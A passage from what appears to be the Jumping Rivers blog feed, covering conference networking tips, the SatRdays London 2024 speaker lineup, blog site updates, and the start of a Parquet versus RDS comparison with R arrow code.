&lt;h2 id="im-not-used-to-a-conference-this-big-theres-multiple-talks-going-on-at-the-same-time-whats-the-etiquette-if-i-want-to-be-in-different-sessions-for-different-talks"&gt;I&amp;rsquo;m not used to a conference this big. There&amp;rsquo;s multiple talks going on at the same time. What&amp;rsquo;s the etiquette if I want to be in different sessions for different talks?&lt;/h2&gt;
&lt;p&gt;Look at the conference programme in advance to plan which talks you want to attend. Big conferences often have &amp;ldquo;streams&amp;rdquo; meaning multiple talks will be happening concurrently.&lt;/p&gt;
&lt;p&gt;The start and end times of the talks are often scheduled to match across streams, so you can switch between streams in the gaps between talks.
It&amp;rsquo;s quite common to see a few people leave at the end of a talk to jump to the other stream.
If you want to change session, go at the same time as this crowd&amp;mdash;just move briskly and quietly so you cause minimal disruption, and sit strategically close to the exit for a quick escape.&lt;/p&gt;
&lt;p&gt;But sometimes it can be a bit awkward to sneak out of the back mid-session, especially if the room is small or talks are overrunning, so sometimes it&amp;rsquo;s easier just to commit yourself to a single stream per session.&lt;/p&gt;
&lt;h2 id="okay-gotcha-plan-the-sessions-to-attend-in-advance-while-im-doing-that-are-there-any-useful-sessions-i-should-consider"&gt;Okay, gotcha. Plan the sessions to attend in advance. While I&amp;rsquo;m doing that, are there any useful sessions I should consider?&lt;/h2&gt;
&lt;p&gt;Some conferences run dedicated networking sessions, like the &amp;ldquo;Birds of a Feather&amp;rdquo; sessions at &lt;em&gt;Posit Conference&lt;/em&gt;. These are short, one-off meetups for people who have something in common, e.g. R educators, people working with R in insurance, R-Ladies or R users from Africa. The groups are often smaller and you already share an interest, making networking a little less daunting and the connections a little more relevant.&lt;/p&gt;
&lt;h2 id="right-ive-been-through-the-whole-schedule-i-think-ive-picked-something-for-each-session-now-and-wow-im-going-to-be-busy"&gt;Right, I&amp;rsquo;ve been through the whole schedule. I think I&amp;rsquo;ve picked something for each session now, and wow, I&amp;rsquo;m going to be busy!&lt;/h2&gt;
&lt;p&gt;Great! Just remember that you don&amp;rsquo;t have to go to every session and social event. It&amp;rsquo;s totally okay to skip a session and recharge. Conferences can be exhausting; even I need a quiet minute to myself sometimes. Grab yourself a cup of tea and find a quiet corner to have a little break from the stimulus. Or head back to your hotel room for an afternoon nap. Then you&amp;rsquo;ll be refreshed for the next session. (Just remember to set an alarm&amp;hellip; ⏰)&lt;/p&gt;
&lt;h2 id="well-thank-you-for-the-advice-im-not-sure-i-can-think-of-any-more-questions"&gt;Well thank you for the advice. I&amp;rsquo;m not sure I can think of any more questions.&lt;/h2&gt;
&lt;p&gt;Well on the topic of questions, I have one last tip.
If you enjoyed someone&amp;rsquo;s talk, but don&amp;rsquo;t want to ask a question in the session, you can go and talk to them in the coffee break following their talk. From the speaker&amp;rsquo;s perspective, it&amp;rsquo;s nice to chat with people who got value from your talk, and you&amp;rsquo;ll have another friendly face in the lunch queue.&lt;/p&gt;
&lt;h2 id="do-you-have-any-suggestions-for-good-conferences-to-go-to"&gt;Do you have any suggestions for good conferences to go to?&lt;/h2&gt;
&lt;p&gt;How about &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists Meetup&lt;/a&gt;, &lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt; or &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production&lt;/a&gt; in June 2026?
You can register to attend by visiting those websites.
They&amp;rsquo;re being organised by &lt;a href="https://jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="ill-take-a-look-thanks"&gt;I&amp;rsquo;ll take a look, thanks.&lt;/h2&gt;
&lt;p&gt;And hey, if I see you there, you&amp;rsquo;ll have an extroverted friend who can introduce you to &lt;em&gt;everyone&lt;/em&gt; at the conference.&lt;/p&gt;
&lt;h2 id="oh-no-"&gt;oh no 😰&lt;/h2&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Speakers</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/</link><pubDate>Tue, 27 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;SatRdays London is fast approaching and we are happy to announce our full lineup of speakers for the event! Read on for more info. If you want to join in the fun, head over to the &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to sign up!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll be at the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt;, courtesy of &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; on 27th April 2024!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-satrdays-speaker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="applying-product-management-in-data-science"&gt;Applying product management in data science&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Andrie is Director of Product Strategy at Posit (formerly RStudio) where he works on the Posit
commercial products. He started using R in 2009 for market research statistics, and later joined
Revolution Analytics and then Microsoft, where he helped customers implement advanced analytics
and machine learning workflows. To keep healthy, he practices yoga and does some recreational
running and canoeing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="hannah-frick---posit"&gt;&lt;a href="https://www.linkedin.com/in/hannah-frick" rel="external"&gt;Hannah Frick&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/hannah@2x.jpg" alt="Photo of Hannah Frick" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="survival-analysis-is-coming-to-tidymodels"&gt;Survival analysis is coming to tidymodels&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;If you have time-to-event data, such as data on customer churn, data on the lifetime of machines, or similar, survival analysis with its censored regression models gives you the ability to include all your observations in the model appropriately, including those where you may not have observed the event yet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The tidymodels framework is a collection of packages for safe, performant, and expressive supervised predictive modeling on tabular data. The framework&amp;rsquo;s consistency makes switching between models easy, its guardrails against common pitfalls such as overfitting due to data leakage make it safe. It covers the entire modeling workflow: preprocessing and feature engineering, models, resamples, performance metrics, and tuning.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;We are now extending support for survival analysis across the entire tidymodels framework with dedicated models and metrics, allowing the same ease and expressiveness as for classification and regression, across all steps of the modeling process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="charlie-gao---hibiki-ai-limited"&gt;&lt;a href="https://shikokuchuo.net/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://hibiki-ai.com/" rel="external"&gt;Hibiki AI Limited&lt;/a&gt; &lt;img src="images/charlie@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="mirai-for-shiny-and-plumber-applications"&gt;‘mirai’ for Shiny and Plumber Applications&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;‘mirai’ is Japanese for ‘future’. Some of the existing solutions for parallelization in R have not fundamentally changed in 20 years. The technologies behind ‘mirai’ are, in contrast, modern and minimalist, and provide a level of performance that will be noticeable for demanding, client-facing workloads typical of Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a scheduler for distributed tasks, ‘mirai’ currently powers the high performance computing needs for the ‘targets’ reproducible-workflow ecosystem, whether locally, on traditional HPC clusters or the cloud. It has undergone the validation required to reliably handle demanding scientific workloads such as clinical trials simulations. At R Project Sprint 2023, it was integrated as a backend for the base R ‘parallel’ package at the request of R-Core.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The same industrial-strength, yet incredibly lightweight solution is now available to power large-scale Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This presentation demonstrates how ‘mirai’ works in typical example situations which benefit from parallelization of computations, and the different ways they may be distributed to background processes on the same machine or across a network of servers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;A particular highlight will be the zero-configuration TLS option. This ‘just works’ to protect remote connections using single-use certificates generated on-the-fly. This was developed under an R Consortium infrastructure grant that aims to make such technologies available to the wider R community.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="michael-hogers---npl-markets-ltd"&gt;&lt;a href="https://www.linkedin.com/in/michaelhogers" rel="external"&gt;Michael Hogers&lt;/a&gt; - &lt;a href="https://nplmarkets.com/" rel="external"&gt;NPL Markets Ltd&lt;/a&gt; &lt;img src="images/michael@2x.jpg" alt="Photo of Michael Hogers" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="modular-shinyproxy---a-saas-setup"&gt;Modular Shiny(Proxy) - a SaaS setup&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;I aim to provide a talk that shows how one can use R, Shiny and ShinyProxy (or other deployment methods) to create a modular SaaS platform whose modules can later be swapped out for new languages or frameworks. The key ingredients are: use a database back-end across Shiny modules, deploy modules as relatively small apps to dedicated URL endpoints, use a shared UI library across Shiny modules and package your Shiny apps (+ use CI/CD) while keeping business logic separated so that business logic functions can be exported later on.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matthew-lam--matthew-law---mott-macdonald"&gt;&lt;a href="https://www.linkedin.com/in/matthewgarethlam/" rel="external"&gt;Matthew Lam&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/matthewjlaw/" rel="external"&gt;Matthew Law&lt;/a&gt; - &lt;a href="https://www.mottmac.com/" rel="external"&gt;Mott MacDonald&lt;/a&gt;&lt;/h3&gt;
&lt;div&gt;&lt;img src="images/matthew-lam@2x.jpg" alt="Photo of Matthew Lam" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;img src="images/matthew-law@2x.jpg" alt="Photo of Matthew Law" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;/div&gt;
&lt;h4 id="how-mott-macdonald-unlocks-the-power-of-geospatial-data-with-r"&gt;How Mott MacDonald unlocks the power of geospatial data with R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Mott MacDonald is a global engineering, management, and development consultancy with a broad portfolio of projects across various engineering disciplines. Geospatial data plays an instrumental role in supporting projects in these sectors, enabling us to understand the world around us so that we can make better informed decisions, improve efficiencies, and drive digital innovation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this presentation, we will illustrate how we use R at Mott MacDonald to harness the power of geospatial data with two examples – Risk Modelling for Ash Dieback and Creative Geospatial Visualisation for Impactful Communication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The Ash Dieback Pipeline is a computer vision project which attempts to identify trees with the Ash Dieback disease from video footage of roadways around the UK. We intend to showcase how we use R to process a variety of geospatial datasets and attempt to model the risk to road users associated with a diseased tree remaining untreated.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Our work at Mott MacDonald often involves wrangling complex datasets to answer multifaceted questions. R provides excellent toolkits for integrating, analysing, and visualising geospatial datasets. We intend to demonstrate how R can be used for creative visualisation of geospatial data to extract and communicate actionable insights.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Through these examples, we hope to outline our team’s maturity journey towards building multilingual spatial data science capabilities alongside traditional GIS platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="myles-mitchell---jumping-rivers"&gt;&lt;a href="https://uk.linkedin.com/in/myles-mitchell-4009aa98" rel="external"&gt;Myles Mitchell&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; &lt;img src="images/myles@2x.jpg" alt="Photo of Myles Mitchell" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="using-r-to-teach-r"&gt;Using R to teach R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;At Jumping Rivers, we teach over forty courses covering data science topics, including programming, data visualisation and machine learning, in R as well as Python, Tableau, Git, Docker and Stan. Most courses follow the same template: static notes, live coding scripts and presentation slides. For every taught course we also have to spin up a bespoke virtual environment, collect feedback and generate certificates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk, I will explain how we have used R to streamline the course writing process, automate the course build and deployment to Posit Workbench, and conduct post-course administrative tasks. With over 100 courses taught every year, each step in this pipeline must be rigorously tested so that, on the day, the trainer can focus on the attendees without having to worry about technical issues.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will draw on our process&amp;rsquo;s successes (and shortcomings) and share some take-home lessons applicable to any big coding project, including packaging of source code, automated testing and scheduled builds.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="nicola-rennie---lancaster-university"&gt;&lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; - &lt;a href="https://www.lancaster.ac.uk/health-and-medicine/research/statistics/" rel="external"&gt;Lancaster University&lt;/a&gt; &lt;img src="images/nicola@2x.jpg" alt="Photo of Nicola Rennie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="typst-or-latex-styling-pdf-documents-with-quarto-extensions"&gt;Typst or LaTeX? Styling PDF documents with Quarto extensions&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Quarto is an open-source scientific and technical publishing system that allows you to combine text with code to create fully reproducible documents in a variety of formats. The addition of custom styling to documents can make them look more professional and recognisable. In this talk, I&amp;rsquo;ll give an overview of ways to create customised PDF documents using Quarto. Until recently, this meant getting to grips with LaTeX. Now, there&amp;rsquo;s a new kid on the block: Typst. Typst is an open-source typesetting system that is designed to be as powerful as LaTeX while being much easier to learn and use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Extensions are a powerful way to modify and extend the behaviour of Quarto, including adding styling to your documents with LaTeX or Typst. To demonstrate the differences between LaTeX and Typst, I’ll walk through the process of converting a LaTeX-based style extension to Typst, allowing users to easily switch between them. We’ll compare the two – discussing error messages (we all get them!), render time, and customisability along the way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matt-thomas---british-red-cross"&gt;&lt;a href="https://www.linkedin.com/in/matthewgthomas/" rel="external"&gt;Matt Thomas&lt;/a&gt; - &lt;a href="https://www.redcross.org.uk/" rel="external"&gt;British Red Cross&lt;/a&gt; &lt;img src="images/matt@2x.jpg" alt="Photo of Matt Thomas" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="where-data-meets-disaster-a-journey-through-the-british-red-crosss-humaniverse"&gt;Where data meets disaster: A journey through the British Red Cross’s &amp;lsquo;humaniverse&amp;rsquo;&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;The ‘Humaniverse’ is a suite of R packages produced by the British Red Cross’s data scientists for sharing humanitarian data and tools. Open data and analyses are vital for 21st Century humanitarianism and these packages have transformed the speed and scale at which we can provide answers about emerging and ongoing humanitarian crises in the UK. In this talk, I will offer an overview of the Humaniverse and will share some of the ways we have used this infrastructure to inform how the British Red Cross supports people affected by disasters, displacement, and health crises. I will cover our core R packages, discuss how and why we work in the open, demonstrate some of the analyses and apps we’ve built using this infrastructure, and share our ambitions for the future of the Humaniverse.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>A Blog Post About the Blog</title><link>https://www.jumpingrivers.com/blog/blog-post-about-the-blog/</link><pubDate>Thu, 15 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/blog-post-about-the-blog/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/blog-post-about-the-blog/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/blog-post-about-the-blog/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main .blog-content img {
display: block;
width: 500px;
max-width: 100%;
margin: 0 auto;
border: 1px solid #888
}
&lt;/style&gt;
&lt;p&gt;If you&amp;rsquo;re a regular visitor to our blog you may have noticed some recent changes we hope will make it easier to find what you&amp;rsquo;re looking for (or interesting stuff you weren&amp;rsquo;t).&lt;/p&gt;
&lt;p&gt;The blog &amp;ldquo;home&amp;rdquo; page, &amp;ldquo;/blog&amp;rdquo;, now shows a card for every post with title, author, excerpt, tags and image. (But don&amp;rsquo;t worry, we won&amp;rsquo;t clog your browser up by trying to force every image to load at once.) This new layout means no more hunting backwards and forwards through pages to find what you&amp;rsquo;re looking for. Moreover, the new search bar can help you find things with a couple of taps on the keyboard. The URL is updated when you finish a search so you can easily share the results with others. For example, here are &lt;a href="https://www.jumpingrivers.com/blog/?search=shiny+in+production" rel="external"&gt;all cards that mention Shiny in Production&lt;/a&gt;.&lt;/p&gt;
&lt;img src="assets/search-bar.jpg" srcset="assets/search-bar@2x.jpg 2x" alt="Screenshot showing the blog listings page with 'Shiny in Production' typed in the search bar and the URL updated accordingly."/&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The tags pages have also been updated in a similar fashion, with the addition of a search bar if there are more than five results listed.&lt;/p&gt;
&lt;img src="assets/tag-search.jpg" srcset="assets/tag-search@2x.jpg 2x" alt="Screenshot of the Tidyverse Tag page. 'ggplot' has been searched for."/&gt;
&lt;p&gt;And, finally, we&amp;rsquo;ve added brand-new author pages so you can quickly find all blog posts written (or co-written) by any of our team here at Jumping Rivers.&lt;/p&gt;
&lt;img src="assets/author-page.jpg" srcset="assets/author-page@2x.jpg 2x" alt="Pair of screenshots showing the author listing from the blog sidebar and the top of one of the author pages."/&gt;
&lt;p&gt;Feel free to tell us what you think via the usual social media channels and let us know if there&amp;rsquo;s something you think we&amp;rsquo;re missing.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/blog-post-about-the-blog/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Parquet vs the RDS Format</title><link>https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/</link><pubDate>Thu, 01 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;Understanding the Parquet file
format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;Reading and Writing Data with
{arrow}&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Parquet vs the RDS Format (This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The benefit of using the {arrow} package with parquet files is that it
enables you to work with ridiculously large data sets from the comfort
of an R session. Using the NYC-Taxi data from the &lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;previous blog
post&lt;/a&gt;
we can perform standard data science operations, such as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nyc_taxi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(nyc_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nyc_taxi &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(month) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(trip_distance &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(trip_distance)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;with a speed that seems almost magical. When your dataset is as large as
the NYC-Taxi data, standard file formats such as CSV files and R
binary files simply aren’t an option.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-arrow-rds-parquet-comparison"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;However, let’s suppose you are in the situation where your data is
inconvenient - not big, just a bit annoying. For example, we could take a
single year and a single month:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(nyc_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; month &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data is still large, with around eight million rows&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(taxi_subset)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and takes around 1.2GB of RAM when we load it into R. The data isn’t
big, just annoying! In this situation, should we use the native binary
format or stick with parquet?&lt;/p&gt;
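&lt;p&gt;As a rough sketch of how a memory figure like this could be checked, base R&amp;rsquo;s &lt;code&gt;object.size()&lt;/code&gt; reports an estimate of the memory allocated to an object. The small data frame below is a made-up stand-in (an assumption, purely for illustration), not the taxi data; with the real data you would pass &lt;code&gt;taxi_subset&lt;/code&gt; instead.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical stand-in for taxi_subset, so the snippet runs on its own
demo_df = data.frame(
  trip_distance = runif(1e5),
  month = sample(1:12, 1e5, replace = TRUE)
)
# Approximate memory used by the object, in human-readable units
format(object.size(demo_df), units = &amp;#34;auto&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;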
&lt;p&gt;In theory, we could use CSV, but that’s really slow!&lt;/p&gt;
&lt;h3 id="rds-vs-parquet"&gt;RDS vs Parquet&lt;/h3&gt;
&lt;p&gt;The RDS format is a binary file format, native to R. It has been part of
R for many years, and provides a convenient method for saving R objects,
including data sets.&lt;/p&gt;
&lt;p&gt;The obvious question is: which file format should you use for storing
tabular data, RDS or parquet? For this comparison, I’m interested in the
following characteristics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the time required to save the file;&lt;/li&gt;
&lt;li&gt;the file size;&lt;/li&gt;
